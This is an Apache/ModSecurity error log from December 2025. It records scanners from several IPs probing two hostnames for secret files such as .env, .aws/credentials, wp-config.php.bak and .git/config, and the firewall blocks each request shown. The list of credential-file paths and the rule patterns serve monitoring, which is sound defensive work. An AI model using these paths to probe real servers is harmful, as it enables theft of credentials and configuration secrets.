[Sun Dec 07 06:16:10.277089 2025] [:error] [pid 575101] [client 195.178.110.108:33506] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aTUNmp5-xCwpsqJ5xa2MuwAAAAo"]
[Sun Dec 07 06:16:10.277342 2025] [:error] [pid 575101] [client 195.178.110.108:33506] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aTUNmp5-xCwpsqJ5xa2MuwAAAAo"]
[Sun Dec 07 06:16:10.277548 2025] [:error] [pid 575101] [client 195.178.110.108:33506] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aTUNmp5-xCwpsqJ5xa2MuwAAAAo"]
[Sun Dec 07 06:16:10.404054 2025] [:error] [pid 575101] [client 195.178.110.108:33506] [client 195.178.110.108] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aTUNmp5-xCwpsqJ5xa2MvAAAAAo"]
[Sun Dec 07 06:16:10.404286 2025] [:error] [pid 575101] [client 195.178.110.108:33506] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aTUNmp5-xCwpsqJ5xa2MvAAAAAo"]
[Sun Dec 07 06:16:10.404488 2025] [:error] [pid 575101] [client 195.178.110.108:33506] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aTUNmp5-xCwpsqJ5xa2MvAAAAAo"]
[Sun Dec 07 06:16:10.537509 2025] [:error] [pid 575101] [client 195.178.110.108:33506] [client 195.178.110.108] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aTUNmp5-xCwpsqJ5xa2MvQAAAAo"]
[Sun Dec 07 06:16:10.537631 2025] [:error] [pid 575101] [client 195.178.110.108:33506] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aTUNmp5-xCwpsqJ5xa2MvQAAAAo"]
[Sun Dec 07 06:16:10.537847 2025] [:error] [pid 575101] [client 195.178.110.108:33506] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aTUNmp5-xCwpsqJ5xa2MvQAAAAo"]
[Sun Dec 07 06:16:10.538036 2025] [:error] [pid 575101] [client 195.178.110.108:33506] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aTUNmp5-xCwpsqJ5xa2MvQAAAAo"]
[Sun Dec 07 06:16:26.987676 2025] [:error] [pid 573220] [client 195.178.110.108:56180] [client 195.178.110.108] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/storage/logs/laravel.log"] [unique_id "aTUNqqxAi-0-oAL0IKmU_gAAAAI"]
[Sun Dec 07 06:16:26.987998 2025] [:error] [pid 573220] [client 195.178.110.108:56180] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/storage/logs/laravel.log"] [unique_id "aTUNqqxAi-0-oAL0IKmU_gAAAAI"]
[Sun Dec 07 06:16:26.988220 2025] [:error] [pid 573220] [client 195.178.110.108:56180] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/storage/logs/laravel.log"] [unique_id "aTUNqqxAi-0-oAL0IKmU_gAAAAI"]
[Sun Dec 07 06:17:15.737265 2025] [authz_core:error] [pid 575099] [client 195.178.110.108:37852] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config
[Sun Dec 07 06:17:15.889318 2025] [:error] [pid 575099] [client 195.178.110.108:37852] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/parameters.yml found within REQUEST_FILENAME: /config/parameters.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/parameters.yml"] [unique_id "aTUN2-plfNiR5IsYA3LJvwAAAAk"]
[Sun Dec 07 06:17:15.889580 2025] [:error] [pid 575099] [client 195.178.110.108:37852] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/parameters.yml"] [unique_id "aTUN2-plfNiR5IsYA3LJvwAAAAk"]
[Sun Dec 07 06:17:15.889778 2025] [:error] [pid 575099] [client 195.178.110.108:37852] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/parameters.yml"] [unique_id "aTUN2-plfNiR5IsYA3LJvwAAAAk"]
[Sun Dec 07 06:17:22.199187 2025] [:error] [pid 575099] [client 195.178.110.108:37852] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/config/config.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/config.yml found within REQUEST_FILENAME: /api/config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/config/config.yml"] [unique_id "aTUN4uplfNiR5IsYA3LJxQAAAAk"]
[Sun Dec 07 06:17:22.199423 2025] [:error] [pid 575099] [client 195.178.110.108:37852] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/config/config.yml"] [unique_id "aTUN4uplfNiR5IsYA3LJxQAAAAk"]
[Sun Dec 07 06:17:22.199622 2025] [:error] [pid 575099] [client 195.178.110.108:37852] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/config/config.yml"] [unique_id "aTUN4uplfNiR5IsYA3LJxQAAAAk"]
[Sun Dec 07 06:17:38.520854 2025] [:error] [pid 575112] [client 195.178.110.108:58088] [client 195.178.110.108] ModSecurity: Warning. Matched phrase ".travis.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .travis.yml found within REQUEST_FILENAME: /.travis.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.travis.yml"] [unique_id "aTUN8lIBBWS88v5sLMHbXAAAAA4"]
[Sun Dec 07 06:17:38.521088 2025] [:error] [pid 575112] [client 195.178.110.108:58088] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.travis.yml"] [unique_id "aTUN8lIBBWS88v5sLMHbXAAAAA4"]
[Sun Dec 07 06:17:38.521261 2025] [:error] [pid 575112] [client 195.178.110.108:58088] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.travis.yml"] [unique_id "aTUN8lIBBWS88v5sLMHbXAAAAA4"]
[Sun Dec 07 06:17:48.743132 2025] [:error] [pid 575098] [client 195.178.110.108:36724] [client 195.178.110.108] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/config"] [unique_id "aTUN_MIyjLAtHsCAPK6j6wAAAAg"]
[Sun Dec 07 06:17:48.743374 2025] [:error] [pid 575098] [client 195.178.110.108:36724] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/config"] [unique_id "aTUN_MIyjLAtHsCAPK6j6wAAAAg"]
[Sun Dec 07 06:17:48.743556 2025] [:error] [pid 575098] [client 195.178.110.108:36724] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/config"] [unique_id "aTUN_MIyjLAtHsCAPK6j6wAAAAg"]
[Sun Dec 07 09:31:39.176559 2025] [:error] [pid 573220] [client 45.148.10.250:40228] [client 45.148.10.250] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTU7a6xAi-0-oAL0IKmVEwAAAAI"]
[Sun Dec 07 09:31:39.177005 2025] [:error] [pid 573220] [client 45.148.10.250:40228] [client 45.148.10.250] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTU7a6xAi-0-oAL0IKmVEwAAAAI"]
[Sun Dec 07 09:31:39.177249 2025] [:error] [pid 573220] [client 45.148.10.250:40228] [client 45.148.10.250] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTU7a6xAi-0-oAL0IKmVEwAAAAI"]
[Sun Dec 07 12:11:44.990262 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aTVg8LHrKGegcZ_89jRaUwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.aws/credentials
[Sun Dec 07 12:11:44.990586 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aTVg8LHrKGegcZ_89jRaUwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.aws/credentials
[Sun Dec 07 12:11:44.990782 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aTVg8LHrKGegcZ_89jRaUwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.aws/credentials
[Sun Dec 07 12:11:45.097032 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTVg8bHrKGegcZ_89jRaVAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env
[Sun Dec 07 12:11:45.097416 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTVg8bHrKGegcZ_89jRaVAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env
[Sun Dec 07 12:11:45.097653 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTVg8bHrKGegcZ_89jRaVAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env
[Sun Dec 07 12:11:45.187023 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aTVg8bHrKGegcZ_89jRaVQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.example
[Sun Dec 07 12:11:45.187292 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aTVg8bHrKGegcZ_89jRaVQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.example
[Sun Dec 07 12:11:45.187478 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aTVg8bHrKGegcZ_89jRaVQAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.example
[Sun Dec 07 12:11:45.279055 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aTVg8bHrKGegcZ_89jRaVgAAAAU"], referer: 